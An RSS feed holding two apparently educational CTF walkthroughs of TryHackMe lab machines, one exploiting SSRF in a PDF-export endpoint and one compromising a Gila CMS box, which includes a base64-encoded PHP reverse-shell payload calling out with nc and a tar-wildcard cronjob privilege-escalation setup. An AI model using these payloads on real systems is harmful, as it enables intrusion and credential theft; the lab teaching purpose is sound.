<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: Laach_</title>
    <description>The latest articles on DEV Community by Laach_ (@laach_).</description>
    <link>https://dev.to/laach_</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F3981493%2F01a01b2e-2506-478b-8151-59722908ae9f.png</url>
      <title>DEV Community: Laach_</title>
      <link>https://dev.to/laach_</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/laach_"/>
    <language>en</language>
    <item>
      <title>Surfer - THM</title>
      <dc:creator>Laach_</dc:creator>
      <pubDate>Mon, 15 Jun 2026 22:02:37 +0000</pubDate>
      <link>https://dev.to/laach_/surfer-thm-369p</link>
      <guid>https://dev.to/laach_/surfer-thm-369p</guid>
      <description>&lt;h2&gt;
  
  
  Machine Info
&lt;/h2&gt;

&lt;p&gt;Difficulty: Easy🟩&lt;br&gt;
Link:&amp;nbsp;&lt;a href="https://tryhackme.com/room/surfer" rel="noopener noreferrer"&gt;HERE&lt;/a&gt;&lt;br&gt;
Avg time: 35 Minutes&lt;br&gt;
OS: Linux&lt;/p&gt;

&lt;p&gt;Description:&amp;nbsp;&lt;code&gt;Surf some internal webpages to find the flag!&lt;/code&gt;&lt;/p&gt;
&lt;h2&gt;
  
  
  Recon
&lt;/h2&gt;

&lt;blockquote&gt;
&lt;p&gt;INFO: &lt;em&gt;We're told to go straight to the website, so no nmap scan is needed&lt;/em&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;On the website there is just a login page, with nothing interesting in the source code, so Ferox first&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;sudo &lt;/span&gt;feroxbuster &lt;span class="nt"&gt;-u&lt;/span&gt; &lt;span class="s1"&gt;'http://10.114.163.12'&lt;/span&gt; &lt;span class="nt"&gt;-r&lt;/span&gt; &lt;span class="nt"&gt;-C&lt;/span&gt; 404 
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;200      GET        8l       63w      365c http://10.114.163.12/backup/chat.txt
200      GET      319l      837w     9266c http://10.114.163.12/assets/js/main.js
200      GET        6l       17w     1040c http://10.114.163.12/assets/img/logo.png
200      GET        8l       17w      840c http://10.114.163.12/assets/img/favicon.png
200      GET      173l      366w     3067c http://10.114.163.12/assets/vendor/simple-datatables/style.css
200      GET        7l       32w     1862c http://10.114.163.12/assets/img/apple-touch-icon.png
200      GET       85l      210w     2731c http://10.114.163.12/assets/vendor/php-email-form/validate.js
200      GET      952l     2306w    25273c http://10.114.163.12/assets/vendor/quill/quill.bubble.css
200      GET     1084l     2366w    21109c http://10.114.163.12/assets/css/style.css
200      GET      945l     2297w    24743c http://10.114.163.12/assets/vendor/quill/quill.snow.css
200      GET        7l     1031w    78129c http://10.114.163.12/assets/vendor/bootstrap/js/bootstrap.bundle.min.js
200      GET       12l      528w    37864c http://10.114.163.12/assets/vendor/simple-datatables/simple-datatables.js
200      GET        1l      133w    65758c http://10.114.163.12/assets/vendor/boxicons/css/boxicons.min.css
200      GET     1556l     7713w    73271c http://10.114.163.12/assets/vendor/bootstrap-icons/bootstrap-icons.css
200      GET        7l     2006w   163873c http://10.114.163.12/assets/vendor/bootstrap/css/bootstrap.min.css
200      GET     2317l    11522w   110438c http://10.114.163.12/assets/vendor/remixicon/remixicon.css
200      GET       13l     2708w   194890c http://10.114.163.12/assets/vendor/chart.js/chart.min.js
200      GET        8l     5631w   216333c http://10.114.163.12/assets/vendor/quill/quill.min.js
200      GET        9l     7014w   391863c http://10.114.163.12/assets/vendor/tinymce/tinymce.min.js
200      GET       45l    13299w  1012551c http://10.114.163.12/assets/vendor/echarts/echarts.min.js
200      GET       14l     6109w   488297c http://10.114.163.12/assets/vendor/apexcharts/apexcharts.min.js
200      GET     6135l    12251w   183063c http://10.114.163.12/assets/vendor/bootstrap-icons/
200      GET      113l      291w     4774c http://10.114.163.12/login.php
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;blockquote&gt;
&lt;p&gt;INFO: &lt;em&gt;I got lucky and guessed the credentials on the first try, but feroxbuster is shown here as good practice&lt;/em&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Found &lt;code&gt;backup/chat.txt&lt;/code&gt;, which contained a chat log.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Admin: I have finished setting up the new export2pdf tool.
Kate: Thanks, we will require daily system reports in pdf format.
Admin: Yes, I am updated about that.
Kate: Have you finished adding the internal server.
Admin: Yes, it should be serving flag from now.
Kate: Also Don't forget to change the creds, plz stop using your username as password.
Kate: Hello.. ?
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This reveals the &lt;code&gt;export2pdf&lt;/code&gt; functionality and admin credentials: &lt;code&gt;admin:admin&lt;/code&gt;.&lt;/p&gt;

&lt;h2&gt;
  
  
  Exploiting SSRF
&lt;/h2&gt;

&lt;p&gt;As this room is SSRF-targeted, I'll briefly explain what SSRF is.&lt;/p&gt;

&lt;p&gt;SSRF (Server-Side Request Forgery) tricks the server into making requests for you. This way you can reach internal resources like localhost or internal network servers that normally aren't accessible from the outside.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3bghcmsnrprnx45e5b50.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3bghcmsnrprnx45e5b50.png" alt="SSRF CHART" width="530" height="232"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Here the unexpected destination is localhost or some server on the internal network. To learn about all kinds of web security, go to &lt;a href="https://portswigger.net/web-security/all-topics" rel="noopener noreferrer"&gt;Portswigger Academy&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;After logging in there is a dashboard with some dummy data, but there are two important pieces of info in &lt;code&gt;Recent Activity&lt;/code&gt; and &lt;code&gt;Reports&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;code&gt;Recent Activity&lt;/code&gt; contains this information:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Internal pages hosted at&amp;nbsp;/internal/admin.php. It contains the system flag.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Trying to visit this URL directly returns&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;This page can only be accessed locally.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;code&gt;Reports&lt;/code&gt; has more interesting data about &lt;code&gt;Hosting Server Information&lt;/code&gt;, such as OS, IP, hostname and more. Under this data there is an &lt;code&gt;Export to PDF&lt;/code&gt; option. After clicking it, the request goes to &lt;code&gt;export2pdf.php&lt;/code&gt;; looking in Burp, this endpoint takes a &lt;code&gt;url&lt;/code&gt; parameter.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nv"&gt;url&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;http%3A%2F%2F127.0.0.1%2Fserver-info.php
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;It's URL-encoded. Decoded, it reads&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;url=http://127.0.0.1/server-info.php
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Changing this value to&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;url=http://127.0.0.1/internal/admin.php
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;and using Burp's &lt;code&gt;RMB -&amp;gt; Request in browser -&amp;gt; In current browser session&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fl9nt9csnvew7flu01v33.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fl9nt9csnvew7flu01v33.png" alt="burp" width="625" height="162"&gt;&lt;/a&gt;&lt;br&gt;
Copy the URL, paste it in the browser and there will be a beautiful response with the flag. &lt;/p&gt;

&lt;p&gt;In this case the server fetched the provided URL and exported it to PDF, even for pages that are supposed to be internal only. The "locally only" check on &lt;code&gt;/internal/admin.php&lt;/code&gt; only verifies that the request originates from localhost, and the PDF exporter runs on that same host, so its request passes the check. That's how SSRF works.&lt;/p&gt;

</description>
      <category>cybersecurity</category>
      <category>tutorial</category>
      <category>linux</category>
      <category>ctf</category>
    </item>
    <item>
      <title>CMesS - THM</title>
      <dc:creator>Laach_</dc:creator>
      <pubDate>Mon, 15 Jun 2026 13:45:43 +0000</pubDate>
      <link>https://dev.to/laach_/cmess-thm-dld</link>
      <guid>https://dev.to/laach_/cmess-thm-dld</guid>
      <description>&lt;h2&gt;
  
  
  Machine Info
&lt;/h2&gt;

&lt;p&gt;Difficulty: Medium🟧&lt;br&gt;
Link:&amp;nbsp;&lt;a href="https://tryhackme.com/room/cmess" rel="noopener noreferrer"&gt;HERE&lt;/a&gt;&lt;br&gt;
Avg time: 75 Minutes&lt;br&gt;
OS: Linux&lt;/p&gt;

&lt;p&gt;Description:&amp;nbsp;&lt;code&gt;Can you root this Gila CMS box?&lt;/code&gt;&lt;/p&gt;
&lt;h2&gt;
  
  
  Recon
&lt;/h2&gt;

&lt;blockquote&gt;
&lt;p&gt;INFO: Before &lt;code&gt;nmap&lt;/code&gt; we are told to add &lt;code&gt;[IP] cmess.thm&lt;/code&gt; to &lt;code&gt;/etc/hosts&lt;/code&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Casual &lt;code&gt;nmap&lt;/code&gt; scan&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;sudo &lt;/span&gt;nmap cmess.thm &lt;span class="nt"&gt;-Pn&lt;/span&gt; &lt;span class="nt"&gt;-sV&lt;/span&gt; &lt;span class="nt"&gt;-sC&lt;/span&gt; &lt;span class="nt"&gt;-p-&lt;/span&gt; &lt;span class="nt"&gt;-T4&lt;/span&gt; &lt;span class="nt"&gt;-n&lt;/span&gt; &lt;span class="nt"&gt;-O&lt;/span&gt; &lt;span class="nt"&gt;-oN&lt;/span&gt; scan.txt
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;Starting Nmap 7.99 &lt;span class="o"&gt;(&lt;/span&gt; https://nmap.org &lt;span class="o"&gt;)&lt;/span&gt; at 2026-06-15 13:54 +0200
Nmap scan report &lt;span class="k"&gt;for &lt;/span&gt;cmess.thm &lt;span class="o"&gt;(&lt;/span&gt;10.114.129.136&lt;span class="o"&gt;)&lt;/span&gt;
Host is up &lt;span class="o"&gt;(&lt;/span&gt;0.028s latency&lt;span class="o"&gt;)&lt;/span&gt;&lt;span class="nb"&gt;.&lt;/span&gt;
Not shown: 65533 closed tcp ports &lt;span class="o"&gt;(&lt;/span&gt;reset&lt;span class="o"&gt;)&lt;/span&gt;
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 &lt;span class="o"&gt;(&lt;/span&gt;Ubuntu Linux&lt;span class="p"&gt;;&lt;/span&gt; protocol 2.0&lt;span class="o"&gt;)&lt;/span&gt;
| ssh-hostkey: 
|   2048 d9:b6:52:d3:93:9a:38:50:b4:23:3b:fd:21:0c:05:1f &lt;span class="o"&gt;(&lt;/span&gt;RSA&lt;span class="o"&gt;)&lt;/span&gt;
|   256 21:c3:6e:31:8b:85:22:8a:6d:72:86:8f:ae:64:66:2b &lt;span class="o"&gt;(&lt;/span&gt;ECDSA&lt;span class="o"&gt;)&lt;/span&gt;
|_  256 5b:b9:75:78:05:d7:ec:43:30:96:17:ff:c6:a8:6c:ed &lt;span class="o"&gt;(&lt;/span&gt;ED25519&lt;span class="o"&gt;)&lt;/span&gt;
80/tcp open  http    Apache httpd 2.4.18 &lt;span class="o"&gt;((&lt;/span&gt;Ubuntu&lt;span class="o"&gt;))&lt;/span&gt;
| http-robots.txt: 3 disallowed entries 
|_/src/ /themes/ /lib/
|_http-title: Site doesn&lt;span class="s1"&gt;'t have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-generator: Gila CMS
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.99%E=4%D=6/15%OT=22%CT=1%CU=42629%PV=Y%DS=3%DC=I%G=Y%TM=6A2FE82
OS:5%P=x86_64-pc-linux-gnu)SEQ(SP=101%GCD=1%ISR=10B%TI=Z%CI=I%II=I%TS=8)SEQ
OS:(SP=102%GCD=1%ISR=10F%TI=Z%CI=I%II=I%TS=8)SEQ(SP=103%GCD=1%ISR=10A%TI=Z%
OS:CI=I%II=I%TS=8)SEQ(SP=106%GCD=1%ISR=10B%TI=Z%CI=I%II=I%TS=8)SEQ(SP=FC%GC
OS:D=1%ISR=10D%TI=Z%CI=I%II=I%TS=8)OPS(O1=M4E8ST11NW7%O2=M4E8ST11NW7%O3=M4E
OS:8NNT11NW7%O4=M4E8ST11NW7%O5=M4E8ST11NW7%O6=M4E8ST11)WIN(W1=68DF%W2=68DF%
OS:W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN(R=Y%DF=Y%T=40%W=6903%O=M4E8NNSNW7%CC
OS:=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T
OS:=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=
OS:0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=
OS:Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=
OS:G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 3 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 46.60 seconds

&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Scan reveals:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;22/tcp - SSH&lt;/li&gt;
&lt;li&gt;80/tcp - HTTP&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;HTTP has a &lt;code&gt;robots.txt&lt;/code&gt; with 3 entries: &lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;code&gt;src/&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;themes/&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;lib/&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Shell as www-data
&lt;/h2&gt;

&lt;p&gt;My first thought was to visit &lt;code&gt;src/&lt;/code&gt;; it redirected to something looking like a potential LFI&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Faut9qi1vqlyhocqbjhtb.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Faut9qi1vqlyhocqbjhtb.png" alt="LFI url"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;But no matter what I tried I couldn't retrieve &lt;code&gt;/etc/passwd&lt;/code&gt;, and RFI didn't work either. &lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;INFO: &lt;em&gt;Other entries in &lt;code&gt;robots.txt&lt;/code&gt; were the same; I tested them but nothing came of it&lt;/em&gt;  &lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Later I tried running &lt;code&gt;Feroxbuster&lt;/code&gt;; there were some unusual files and directories&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt; &lt;span class="nb"&gt;sudo &lt;/span&gt;feroxbuster &lt;span class="nt"&gt;-u&lt;/span&gt; &lt;span class="s1"&gt;'http://cmess.thm/'&lt;/span&gt; &lt;span class="nt"&gt;-r&lt;/span&gt; &lt;span class="nt"&gt;-C&lt;/span&gt; 404
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;403      GET        9l       28w      274c http://cmess.thm/lib/?url&lt;span class="o"&gt;=&lt;/span&gt;lib
403      GET        9l       28w      274c http://cmess.thm/src/?url&lt;span class="o"&gt;=&lt;/span&gt;src
403      GET        9l       28w      274c http://cmess.thm/themes/?url&lt;span class="o"&gt;=&lt;/span&gt;themes
200      GET      107l      290w     3851c http://cmess.thm/index
200      GET       44l      113w     1605c http://cmess.thm/src/core/assets/lazyImgLoad.js
200      GET       43l       98w     1360c http://cmess.thm/login/password_reset
200      GET      799l     1024w    15763c http://cmess.thm/lib/gila.min.css
200      GET        4l       66w    31000c http://cmess.thm/lib/font-awesome/css/font-awesome.min.css
200      GET       92l      266w     3353c http://cmess.thm/about
200      GET       68l      422w    25046c http://cmess.thm/assets/gila-logo.png
200      GET      107l      290w     3851c http://cmess.thm/search
200      GET      107l      290w     3851c http://cmess.thm/blog
200      GET       41l       99w     1580c http://cmess.thm/login
200      GET      109l      291w     3862c http://cmess.thm/category
200      GET      102l      308w     4078c http://cmess.thm/1/hello_world
200      GET      107l      290w     3865c http://cmess.thm/
200      GET      102l      308w     4078c http://cmess.thm/1
200      GET        1l        4w       68c http://cmess.thm/login/register
200      GET       21l       42w      735c http://cmess.thm/feed
200      GET      107l      290w     3851c http://cmess.thm/0
200      GET      101l      272w     3590c http://cmess.thm/author
200      GET      102l      308w     4078c http://cmess.thm/01
200      GET      109l      292w     3874c http://cmess.thm/tag
200      GET      107l      290w     3851c http://cmess.thm/Search
200      GET       92l      266w     3339c http://cmess.thm/About
200      GET      107l      290w     3851c http://cmess.thm/Index
200      GET        0l        0w        0c http://cmess.thm/api
200      GET        1l        4w       68c http://cmess.thm/login/Register
200      GET       14l       40w      563c http://cmess.thm/assets/?url&lt;span class="o"&gt;=&lt;/span&gt;assets
500      GET        0l        0w        0c http://cmess.thm/cm
200      GET        0l        0w        0c http://cmess.thm/fm
200      GET      107l      290w     3851c http://cmess.thm/INDEX
200      GET        0l        0w        0c http://cmess.thm/login/callback
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;There were some weird outputs, but most of them were either not found or the main page. The only thing that caught my attention was a possible IDOR.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;http://cmess.thm/0
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;It returned the home page with a post containing its title and body, but&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;http://cmess.thm/1
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;returned the title, &lt;code&gt;posted by&lt;/code&gt; and body, but &lt;code&gt;posted by&lt;/code&gt; was empty, which was weird. I did try other numbers such as 2, 3, 4 but they returned not found, so it was a rabbit hole. Ferox also revealed the path &lt;code&gt;/login/register&lt;/code&gt; but it redirected to a 404 — another rabbit hole. I also tried brute force on &lt;code&gt;login/&lt;/code&gt; with the guessed email &lt;code&gt;admin@cmess.thm&lt;/code&gt; but after 3 tries I got rate limited — another rabbit hole. This whole page seemed like a dead end, so I tried subdomain enum with &lt;code&gt;ffuf&lt;/code&gt;.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;ffuf &lt;span class="nt"&gt;-u&lt;/span&gt; &lt;span class="s1"&gt;'http://cmess.thm'&lt;/span&gt; &lt;span class="nt"&gt;-H&lt;/span&gt; &lt;span class="s2"&gt;"Host: FUZZ.cmess.thm"&lt;/span&gt; &lt;span class="nt"&gt;-w&lt;/span&gt; /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt &lt;span class="nt"&gt;-fw&lt;/span&gt; 522 &lt;span class="nt"&gt;-c&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This finally gave a serious lead&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight console"&gt;&lt;code&gt;&lt;span class="go"&gt;        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://cmess.thm
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
 :: Header           : Host: FUZZ.cmess.thm
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response words: 522
________________________________________________

dev                     [Status: 200, Size: 934, Words: 191, Lines: 31, Duration: 4663ms]
:: Progress: [4989/4989] :: Job [1/1] :: 295 req/sec :: Duration: [0:00:17] :: Errors: 0 ::
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Adding &lt;code&gt;dev.cmess.thm&lt;/code&gt; to &lt;code&gt;/etc/hosts&lt;/code&gt; and visiting it revealed a black page with a Development Log containing credentials for &lt;code&gt;andre@cmess.thm&lt;/code&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight markdown"&gt;&lt;code&gt;&lt;span class="gu"&gt;## Development Log&lt;/span&gt;

&lt;span class="gu"&gt;### andre@cmess.thm&lt;/span&gt;

Have you guys fixed the bug that was found on live?

&lt;span class="gu"&gt;### support@cmess.thm&lt;/span&gt;

Hey Andre, We have managed to fix the misconfigured .htaccess file, we're hoping to patch it in the upcoming patch!

&lt;span class="gu"&gt;### support@cmess.thm&lt;/span&gt;

Update! We have had to delay the patch due to unforeseen circumstances

&lt;span class="gu"&gt;### andre@cmess.thm&lt;/span&gt;

That's ok, can you guys reset my password if you get a moment, I seem to be unable to get onto the admin panel.

&lt;span class="gu"&gt;### support@cmess.thm&lt;/span&gt;

Your password has been reset. Here: KPFTN_f2yxe%
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Credentials worked. There was a CMS dashboard with page editing functionality. In most CMS dashboards, if page editing is available, getting a shell is trivial. At &lt;code&gt;/admin/fm&lt;/code&gt; there is a list of files and directories. Editing &lt;code&gt;index.php&lt;/code&gt; can give a shell. &lt;a href="https://github.com/brightio/penelope" rel="noopener noreferrer"&gt;Penelope&lt;/a&gt; was used as it handles and stabilizes the shell automatically.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;INFO: &lt;em&gt;In this file list there was an interesting file &lt;code&gt;config.php&lt;/code&gt; containing root credentials for MySQL, maybe useful for later.&lt;/em&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Code injected into &lt;code&gt;index.php&lt;/code&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;&lt;span class="cp"&gt;&amp;lt;?php&lt;/span&gt; &lt;span class="nb"&gt;system&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;'printf KHJtIC90bXAvXztta2ZpZm8gL3RtcC9fO2NhdCAvdG1wL198c2ggMj4mMXxuYyAxOTIuMTY4LjEzMS45MSA0NDQ0ID4vdG1wL18pID4vZGV2L251bGwgMj4mMSAm|base64 -d|sh'&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt; &lt;span class="cp"&gt;?&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;After saving and visiting the main page, Penelope catches a shell as &lt;code&gt;www-data&lt;/code&gt;.&lt;/p&gt;

&lt;h2&gt;
  
  
  Shell as Andre
&lt;/h2&gt;

&lt;p&gt;Password reuse from the login page was attempted but didn't work. &lt;a href="https://github.com/peass-ng/PEASS-ng/tree/master/linPEAS" rel="noopener noreferrer"&gt;linpeas&lt;/a&gt; and &lt;a href="https://github.com/dominicbreuker/pspy" rel="noopener noreferrer"&gt;pspy64&lt;/a&gt; were transferred to the target. pspy64 revealed a cronjob running as root every 2 minutes but it wasn't investigated further at this point.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;INFO: &lt;em&gt;The cronjob wasn't investigated because write access to &lt;code&gt;/home/andre&lt;/code&gt; was required.&lt;/em&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;linpeas kept crashing so manual enumeration was done. MySQL was checked using the credentials found earlier but nothing useful was found. Eventually &lt;code&gt;/opt&lt;/code&gt; was checked — an obvious privesc path that was missed earlier due to linpeas issues. Inside was &lt;code&gt;.password.bak&lt;/code&gt; with Andre's password.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight console"&gt;&lt;code&gt;&lt;span class="gp"&gt;www-data@cmess:/opt$&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nb"&gt;ls&lt;/span&gt; &lt;span class="nt"&gt;-al&lt;/span&gt;
&lt;span class="go"&gt;total 12
drwxr-xr-x  2 root root 4096 Feb  6  2020 .
drwxr-xr-x 22 root root 4096 Feb  6  2020 ..
-rwxrwxrwx  1 root root   36 Feb  6  2020 .password.bak
&lt;/span&gt;&lt;span class="gp"&gt;www-data@cmess:/opt$&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nb"&gt;cat&lt;/span&gt; .password.bak
&lt;span class="go"&gt;andres backup password
UQfsdCB7aAP6
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Flag located at: &lt;code&gt;/home/andre/user.txt&lt;/code&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Shell as Root
&lt;/h2&gt;

&lt;p&gt;The root cronjob was performing a backup of every file in &lt;code&gt;/home/andre/backup&lt;/code&gt;.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="k"&gt;*&lt;/span&gt;/2 &lt;span class="k"&gt;*&lt;/span&gt;   &lt;span class="k"&gt;*&lt;/span&gt; &lt;span class="k"&gt;*&lt;/span&gt; &lt;span class="k"&gt;*&lt;/span&gt;   root    &lt;span class="nb"&gt;cd&lt;/span&gt; /home/andre/backup &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="nb"&gt;tar&lt;/span&gt; &lt;span class="nt"&gt;-zcf&lt;/span&gt; /tmp/andre_backup.tar.gz &lt;span class="k"&gt;*&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



